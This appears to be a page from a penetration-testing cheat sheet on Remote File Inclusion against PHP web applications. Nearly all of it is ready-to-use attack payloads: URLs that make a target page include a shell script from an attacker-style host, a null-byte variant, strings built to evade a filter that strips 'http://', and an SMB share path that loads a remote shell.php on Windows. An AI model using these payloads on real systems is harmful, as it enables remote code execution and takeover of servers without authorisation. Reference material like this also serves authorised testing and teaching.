RFI


Most filter bypassing techniques for LFI can be used for RFI.


Basic RFI 
http://example.com/index.php?page=http://example.evil/shell.txt


Null Byte 
http://example.com/index.php?page=http://example.evil/shell.txt%00


Bypass http(s):// removal 
hhttp://thttp://thttp://phttp://:http://http:///http:///
hhttps://thttps://thttps://phttps://shttps://:https:///https:///https://


Bypass allow_url_include 
On Windows, it is possible to bypass disabled allow_url_include and allow_url_fopen by using SMB. Simply including a script located in an open share.
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
PreviousSome Useful NextXXE
Last updated 3 years ago